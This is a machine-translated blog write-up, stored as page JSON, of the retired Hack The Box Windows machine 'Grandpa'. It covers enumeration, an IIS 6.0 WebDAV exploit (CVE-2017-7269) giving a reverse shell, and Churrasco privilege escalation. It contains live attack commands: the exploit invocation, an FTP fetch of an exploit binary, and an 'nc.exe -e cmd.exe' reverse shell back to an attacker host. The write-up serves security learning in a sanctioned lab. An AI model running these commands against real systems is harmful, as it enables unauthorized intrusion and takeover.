{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-windows-grandpa-en","result":{"data":{"markdownRemark":{"id":"86c75e68-c28d-5b18-95b9-ce76093bd72d","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-windows-grandpa\">original page</a>.</p>\n</blockquote>\n
<p>I am studying security using “Hack The Box,” a penetration testing learning platform.\nMy Hack The Box rank at the time of writing is ProHacker.</p>\n
<p><img src=\"/static/598fc82bb08f81fbaaa4aab930820dd3/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\"></p>\n
<p>This is a writeup for the retired HackTheBox machine “Grandpa.”</p>\n
<h2 id=\"about-this-article\">About This Article</h2>\n
<p><strong>The content of this article is not intended to promote acts that violate social order.</strong></p>\n
<p>Please be aware in advance that attacking environments other than your own, or environments you do not have permission to test, may violate the “Act on Prohibition of Unauthorized Computer Access” (Unauthorized Access Prohibition Act).</p>\n
<p>All opinions expressed are my own and do not represent those of any organization I belong to.</p>\n
<h2 id=\"table-of-contents\">Table of Contents</h2>\n
<ul>\n<li>\n<p><a href=\"#enumeration\">Enumeration</a></p>\n<ul>\n<li><a href=\"#port-scan\">Port Scan</a></li>\n<li><a href=\"#webdav-scan\">WebDAV Scan</a></li>\n<li><a href=\"#exploitation\">Exploitation</a></li>\n</ul>\n</li>\n<li><a href=\"#internal-enumeration\">Internal Enumeration</a></li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n
<h2 id=\"enumeration\">Enumeration</h2>\n
<h3 id=\"port-scan\">Port Scan</h3>\n
<p>I start by running Nmap.</p>\n
<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ nmap -sV -sC -T4 $RHOST| tee nmap1.txt\nPORT   STATE SERVICE VERSION\n80/tcp open  http    Microsoft IIS httpd 6.0\n| http-methods: \n|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH\n|_http-title: Under Construction\n| http-webdav-scan: \n|   Server Date: Sat, 04 Jun 2022 01:01:45 GMT\n|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK\n|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\n|   WebDAV type: Unknown\n|_  Server Type: Microsoft-IIS/6.0\n|_http-server-header: Microsoft-IIS/6.0\nService Info: OS: Windows; CPE: cpe:/o:microsoft:windows\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 28.16 seconds</code></pre></div>\n
<p>IIS 6.0 appears to be running, so I open it in a browser.</p>\n
<p><img src=\"/static/b2533fe676689a33affdb40498991d33/8c76f/image-20220604100328237.png\" alt=\"image-20220604100328237\" title=\"image-20220604100328237\"></p>\n
<p>Since the page itself gives away little, I run gobuster for enumeration.</p>\n
<p>Several paths were found.</p>\n
<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ gobuster dir -u http://$RHOST/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 40 | tee gobuster1.txt\n\n/images               (Status: 301) [Size: 152] [--> http://$RHOST/images/]\n/Images               (Status: 301) [Size: 152] [--> http://$RHOST/Images/]\n/IMAGES               (Status: 301) [Size: 152] [--> http://$RHOST/IMAGES/] \n/_private             (Status: 403) [Size: 1529] </code></pre></div>\n
<ul>\n<li>Images</li>\n</ul>\n
<p><img src=\"/static/0b73291b0d4076d3a6914778a9962a12/f27fb/image-20220604100519971.png\" alt=\"image-20220604100519971\" title=\"image-20220604100519971\"></p>\n
<ul>\n<li>_private</li>\n</ul>\n
<p><img src=\"/static/a7e2839977c2fd3b80b3dae70703437a/7422e/image-20220604101247760.png\" alt=\"image-20220604101247760\" title=\"image-20220604101247760\"></p>\n
<p>This alone doesn’t give me a useful foothold.</p>\n
<p>I also tried feroxbuster, but nothing useful came up.</p>\n
<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ feroxbuster -u http://$RHOST/  -x asp,aspx -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt | tee feroxbuster.txt</code></pre></div>\n
<h3 id=\"webdav-scan\">WebDAV Scan</h3>\n
<p>Next, I use <code class=\"language-text\">davtest</code> to check WebDAV.</p>\n
<p>Simply put, WebDAV is an extension of HTTP for transferring and managing files on a web server.</p>\n
<p>DAVTest checks whether WebDAV is enabled and which file types the server lets you upload.</p>\n
<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ /usr/bin/davtest -url http://$RHOST/\n********************************************************\n Testing DAV connection\nOPEN            SUCCEED:                http://$RHOST\n********************************************************\nNOTE    Random string for this session: raQC3An4\n********************************************************\n Creating directory\nMKCOL           FAIL\n********************************************************\n Sending test files\nPUT     jhtml   FAIL\nPUT     cfm     FAIL\nPUT     cgi     FAIL\nPUT     jsp     FAIL\nPUT     txt     FAIL\nPUT     pl      FAIL\nPUT     php     FAIL\nPUT     shtml   FAIL\nPUT     asp     FAIL\nPUT     html    FAIL\nPUT     aspx    FAIL\n\n********************************************************</code></pre></div>\n
<p>Reference: <a href=\"https://whitemarkn.com/learning-ethical-hacker/davtest/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Hackers Test WebDAV-Enabled Servers with DAVTest (Kali Linux) | Become a White Hat Hacker Using AI</a></p>\n
<p>Reference: <a href=\"https://nmap.org/nsedoc/scripts/http-webdav-scan.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">http-webdav-scan NSE script — Nmap Scripting Engine documentation</a></p>\n
<p>Nmap’s <code class=\"language-text\">http-webdav-scan</code> results had shown that several methods were available, but unfortunately it seems they can’t be used directly: MKCOL and every PUT failed.</p>\n
<h3 id=\"exploitation\">Exploitation</h3>\n
<p>However, it turns out that IIS 6.0’s WebDAV has a known vulnerability (CVE-2017-7269) that allows authentication bypass and can be used for arbitrary code execution.</p>\n
<p>Reference: <a href=\"https://www.exploit-db.com/exploits/41738\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Microsoft IIS 6.0 - WebDAV ‘ScStoragePathFromUrl’ Remote Buffer Overflow - Windows remote Exploit</a></p>\n
<p>I used the following exploit code:</p>\n
<p>Reference: <a href=\"https://gist.github.com/g0rx/693a89197e0b9d1464cab536fdc9f933\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">iis6-exploit-2017-CVE-2017-7269</a></p>\n
<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">root@pentestlab:~# python revshell.py \nusage:iis6webdav.py targetip targetport reverseip reverseport\n\nroot@pentestlab:~# python revshell.py 10.10.10.14 80 10.10.14.2 9999</code></pre></div>\n
<p>This gave me a reverse shell.</p>\n
<p>Unfortunately, though, I couldn’t read the user flag with the shell I got.</p>\n
<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">whoami\nnt authority\\network service</code></pre></div>\n
<p>So I’ll work toward privilege escalation.</p>\n
<h2 id=\"internal-enumeration\">Internal Enumeration</h2>\n
<p>As usual, I check the user’s privileges.</p>\n
<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">whoami /pri\nPRIVILEGES INFORMATION\n----------------------\nPrivilege Name                Description                               State   \n============================= ========================================= ========\nSeAuditPrivilege              Generate security audits                  Disabled\nSeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled\nSeAssignPrimaryTokenPrivilege Replace a process level token             Disabled\nSeChangeNotifyPrivilege       Bypass traverse checking                  Enabled \nSeImpersonatePrivilege        Impersonate a client after authentication Enabled \nSeCreateGlobalPrivilege       Create global objects                     Enabled </code></pre></div>\n
<p><code class=\"language-text\">SeImpersonatePrivilege</code> is enabled!</p>\n
<p><code class=\"language-text\">SeImpersonatePrivilege</code> allows a server process to impersonate a client after authentication, that is, to act with the client’s credentials.</p>\n
<p>When this privilege is enabled, attacks such as Named Pipe Impersonation become possible.</p>\n
<p>Reference: <a href=\"https://note.com/lacnote/n/nef29b7c6a94f\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">What’s Inside getsystem | Lac Security Stew Blog | note</a></p>\n
<p>Reference: <a href=\"https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Named Pipe Client Impersonation - HackTricks</a></p>\n
<p>There are several attack methods, but on Windows Server 2003, when <code class=\"language-text\">SeImpersonatePrivilege</code> is assigned to <code class=\"language-text\">network service</code>, Churrasco can be used to obtain elevated privileges.</p>\n
<p>So I transferred the Churrasco binary (<code class=\"language-text\">c.exe</code>) via FTP to the writable folder <code class=\"language-text\">C:\\wmpub\\</code> and ran the exploit.</p>\n
<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">echo open 10.10.14.3 > ftp.txt &amp;&amp; echo user user password >> ftp.txt &amp;&amp; echo binary >> ftp.txt &amp;&amp; echo get c.exe c.exe >> ftp.txt &amp;&amp; echo quit >> ftp.txt\n\nftp -n &lt; ftp.txt\n.\\c.exe -d \"C:\\wmpub\\nc.exe -e cmd.exe 10.10.14.3 9999\"</code></pre></div>\n
<p>This gave me a shell with Admin privileges.</p>\n
<p><img src=\"/static/98a258d0272280cdd6dea390bfd1c3ea/ba4d9/image-20220612104939676.png\" alt=\"image-20220612104939676\" title=\"image-20220612104939676\"></p>\n
<p>Honestly I don’t fully understand what Churrasco is doing under the hood, but the source is about 400 lines, so I plan to read through it properly when I have time.</p>\n
<p>Reference: <a href=\"https://github.com/Re4son/Churrasco/blob/master/Churrasco.cpp\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Churrasco/Churrasco.cpp at master · Re4son/Churrasco · GitHub</a></p>\n
<p>Note: when transferring an executable to Windows via FTP, if you use the default ASCII mode instead of the <code class=\"language-text\">binary</code> option, the file arrives corrupted and running it fails with the following error:</p>\n
<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">c.exe\nThis program cannot be run in DOS mode.</code></pre></div>\n
<p>Reference: <a href=\"https://security.stackexchange.com/questions/133946/this-program-can-not-be-run-in-dos-mode\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">privilege escalation - This Program Can not Be Run in DOS Mode - Information Security Stack Exchange</a></p>\n
<p>Reference: <a href=\"https://www.jscape.com/blog/ftp-binary-and-ascii-transfer-types-and-the-case-of-corrupt-files\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">FTP Binary And ASCII Transfer Types And The Case Of Corrupt Files | JSCAPE</a></p>\n
<h2 id=\"summary\">Summary</h2>\n
<p>Windows exploits are hard to understand in detail, so I don’t feel like I’m really hacking.</p>\n
<p>I want to get to the point where I can understand them properly.</p>","fields":{"slug":"/hackthebox-windows-grandpa-en","tagSlugs":["/tag/hack-the-box-en/","/tag/windows-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-06-04","description":"A writeup of the retired HackTheBox machine 'Grandpa'.","tags":["HackTheBox (en)","Windows (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: Grandpa (Easy/Windows)","socialImage":{"publicURL":"/static/65e0040c358d6e6aac91d33a338c1b69/hackthebox-windows-grandpa.png"}}}},"pageContext":{"slug":"/hackthebox-windows-grandpa-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}